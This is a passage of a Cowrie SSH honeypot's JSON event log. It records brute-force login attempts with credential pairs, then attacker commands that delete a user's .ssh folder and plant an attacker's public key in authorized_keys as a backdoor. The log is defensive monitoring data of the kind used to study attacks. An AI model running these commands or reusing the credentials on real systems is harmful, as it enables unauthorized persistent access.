e","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:49:48.458939Z","src_ip":"103.12.154.87","session":"00c3c0101357"}
{"eventid":"cowrie.login.success","username":"root","password":"Dc123456","message":"login attempt [root/Dc123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:49:49.319522Z","src_ip":"103.12.154.87","session":"00c3c0101357"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:49:50.301028Z","src_ip":"103.12.154.87","session":"00c3c0101357"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:49:50.301742Z","src_ip":"103.12.154.87","session":"00c3c0101357"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:49:50.302880Z","src_ip":"103.12.154.87","session":"00c3c0101357"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48821,"dst_ip":"1.2.3.4","dst_port":22,"session":"d97ce99ff88d","protocol":"ssh","message":"New connection: 212.227.235.229:48821 (1.2.3.4:22) [session: d97ce99ff88d]","sensor":"my-vps","timestamp":"2025-08-26T06:49:50.333105Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:49:50.519426Z","src_ip":"103.12.154.87","session":"00c3c0101357"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:49:50.965507Z","src_ip":"103.12.154.87","session":"00c3c0101357"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T06:49:50.966174Z","src_ip":"103.12.154.87","session":"00c3c0101357"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T06:49:51.184712Z","src_ip":"103.12.154.87","session":"00c3c0101357"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:49:51.185642Z","src_ip":"103.12.154.87","session":"00c3c0101357"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":48310,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0bf31eb7ffd","protocol":"ssh","message":"New connection: 103.12.154.87:48310 (1.2.3.4:22) [session: e0bf31eb7ffd]","sensor":"my-vps","timestamp":"2025-08-26T06:49:51.397320Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:49:51.400095Z","src_ip":"103.12.154.87","session":"e0bf31eb7ffd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:49:51.611516Z","src_ip":"103.12.154.87","session":"e0bf31eb7ffd"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:49:52.333962Z","src_ip":"212.227.235.229","session":"d97ce99ff88d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42263,"dst_ip":"1.2.3.4","dst_port":22,"session":"68404b815666","protocol":"ssh","message":"New connection: 212.227.235.229:42263 (1.2.3.4:22) [session: 68404b815666]","sensor":"my-vps","timestamp":"2025-08-26T06:49:52.427151Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:49:52.427922Z","src_ip":"212.227.235.229","session":"68404b815666"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-26T06:49:52.522197Z","src_ip":"212.227.235.229","session":"68404b815666"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:49:52.617785Z","src_ip":"212.227.235.229","session":"68404b815666"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T06:49:53.076724Z","src_ip":"103.12.154.87","session":"e0bf31eb7ffd"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:49:54.297292Z","src_ip":"103.12.154.87","session":"e0bf31eb7ffd"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":49722,"dst_ip":"1.2.3.4","dst_port":22,"session":"b31e2cbdf63c","protocol":"ssh","message":"New connection: 103.12.154.87:49722 (1.2.3.4:22) [session: b31e2cbdf63c]","sensor":"my-vps","timestamp":"2025-08-26T06:49:55.499128Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:49:55.501009Z","src_ip":"103.12.154.87","session":"b31e2cbdf63c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:49:56.386416Z","src_ip":"103.12.154.87","session":"b31e2cbdf63c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:49:58.350986Z","src_ip":"103.12.154.87","session":"b31e2cbdf63c"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:49:58.559471Z","src_ip":"103.12.154.87","session":"b31e2cbdf63c"}
{"eventid":"cowrie.session.closed","duration":"11.0","message":"Connection lost after 11.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:49:58.562625Z","src_ip":"103.12.154.87","session":"00c3c0101357"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:50:34.496297Z","src_ip":"212.227.125.160","session":"085b6d208cde"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":44872,"dst_ip":"1.2.3.4","dst_port":22,"session":"04c4a55dfd33","protocol":"ssh","message":"New connection: 103.12.154.87:44872 (1.2.3.4:22) [session: 04c4a55dfd33]","sensor":"my-vps","timestamp":"2025-08-26T06:50:59.841870Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:50:59.843077Z","src_ip":"103.12.154.87","session":"04c4a55dfd33"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:51:00.070915Z","src_ip":"103.12.154.87","session":"04c4a55dfd33"}
{"eventid":"cowrie.login.success","username":"root","password":"Vm123456","message":"login attempt [root/Vm123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:51:01.661115Z","src_ip":"103.12.154.87","session":"04c4a55dfd33"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:51:02.669575Z","src_ip":"103.12.154.87","session":"04c4a55dfd33"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:51:02.670458Z","src_ip":"103.12.154.87","session":"04c4a55dfd33"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:51:02.671374Z","src_ip":"103.12.154.87","session":"04c4a55dfd33"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:51:03.417583Z","src_ip":"103.12.154.87","session":"04c4a55dfd33"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:51:03.989801Z","src_ip":"103.12.154.87","session":"04c4a55dfd33"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T06:51:03.990501Z","src_ip":"103.12.154.87","session":"04c4a55dfd33"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T06:51:04.235787Z","src_ip":"103.12.154.87","session":"04c4a55dfd33"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:51:04.236661Z","src_ip":"103.12.154.87","session":"04c4a55dfd33"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":47144,"dst_ip":"1.2.3.4","dst_port":22,"session":"bedae4ce7f5c","protocol":"ssh","message":"New connection: 103.12.154.87:47144 (1.2.3.4:22) [session: bedae4ce7f5c]","sensor":"my-vps","timestamp":"2025-08-26T06:51:04.476792Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:51:04.478136Z","src_ip":"103.12.154.87","session":"bedae4ce7f5c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:51:04.692314Z","src_ip":"103.12.154.87","session":"bedae4ce7f5c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T06:51:06.332536Z","src_ip":"103.12.154.87","session":"bedae4ce7f5c"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:51:07.560057Z","src_ip":"103.12.154.87","session":"bedae4ce7f5c"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":48502,"dst_ip":"1.2.3.4","dst_port":22,"session":"80a160167fc6","protocol":"ssh","message":"New connection: 103.12.154.87:48502 (1.2.3.4:22) [session: 80a160167fc6]","sensor":"my-vps","timestamp":"2025-08-26T06:51:07.774402Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:51:07.775554Z","src_ip":"103.12.154.87","session":"80a160167fc6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:51:07.999994Z","src_ip":"103.12.154.87","session":"80a160167fc6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:51:08.946373Z","src_ip":"103.12.154.87","session":"80a160167fc6"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:51:09.160370Z","src_ip":"103.12.154.87","session":"80a160167fc6"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:51:09.161395Z","src_ip":"103.12.154.87","session":"04c4a55dfd33"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":42932,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecb49582889c","protocol":"ssh","message":"New connection: 103.12.154.87:42932 (1.2.3.4:22) [session: ecb49582889c]","sensor":"my-vps","timestamp":"2025-08-26T06:52:10.457228Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:52:10.460218Z","src_ip":"103.12.154.87","session":"ecb49582889c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 